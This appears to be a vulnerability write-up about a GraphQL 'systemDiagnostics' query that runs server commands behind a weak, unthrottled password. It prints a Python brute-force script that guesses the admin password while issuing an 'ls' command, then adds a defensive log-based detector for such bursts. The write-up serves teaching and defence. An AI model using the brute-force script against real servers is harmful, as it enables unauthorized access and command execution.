The systemDiagnostics query is an administrative function that allows a subset of system commands to be run on the server. The query requires a username and password before the command is processed.
The password is weak, and the server has no rate limiting protections. This allows an attacker to brute force the credentials with little effort.
# Brute force attack with a list of passwords:
import requests

passwordlist = ['admin123', 'pass123', 'adminadmin', '123']
for password in passwordlist:
    # The GraphQL braces are doubled so that str.format() leaves them
    # intact and only substitutes the {} placeholder for the password.
    resp = requests.post('http://host/graphql',
        json={
            "query": "query {{\n systemDiagnostics(username:\"admin\", password:\"{}\", cmd:\"ls\")\n}}".format(password),
            "variables": None
        })
    if 'errors' not in resp.text:
        print('Password is', password)
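Because the underlying weakness is the missing rate limit, the defensive counterpart is to count failed systemDiagnostics authentications per client and alert on bursts. The following is an added example, not code from the original page: it assumes a constructed access-log format of `client_ip epoch_time operation outcome`, flags any client that fails at least five times within sixty seconds, and separately reports a success that follows such a burst (the signature of a guessed password).

```python
import re
from collections import defaultdict, deque

# Constructed sample log lines (not from the original page): one entry per
# GraphQL request, recording client IP, epoch time, operation and outcome.
SAMPLE_LOG = """\
203.0.113.7 1700000000 systemDiagnostics errors
203.0.113.7 1700000002 systemDiagnostics errors
198.51.100.3 1700000003 pastes ok
203.0.113.7 1700000004 systemDiagnostics errors
203.0.113.7 1700000005 systemDiagnostics errors
203.0.113.7 1700000006 systemDiagnostics errors
203.0.113.7 1700000007 systemDiagnostics ok
198.51.100.3 1700000100 systemDiagnostics errors
"""

LINE_RE = re.compile(r"^(\S+) (\d+) (\S+) (ok|errors)$")

def detect_bruteforce(log_text, window=60, threshold=5):
    """Return (alerts, compromised): alerts maps each client IP to the time
    it first reached `threshold` failed systemDiagnostics calls within
    `window` seconds; compromised holds IPs that then succeeded."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}
    compromised = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # skip lines that do not match the format
        ip, ts, op, outcome = m.group(1), int(m.group(2)), m.group(3), m.group(4)
        if op != "systemDiagnostics":
            continue                # only the password-gated query matters
        recent = failures[ip]
        if outcome == "errors":
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()    # drop failures outside the sliding window
            if len(recent) >= threshold and ip not in alerts:
                alerts[ip] = ts
        elif ip in alerts:
            compromised.add(ip)     # success after a flagged burst
    return alerts, compromised
```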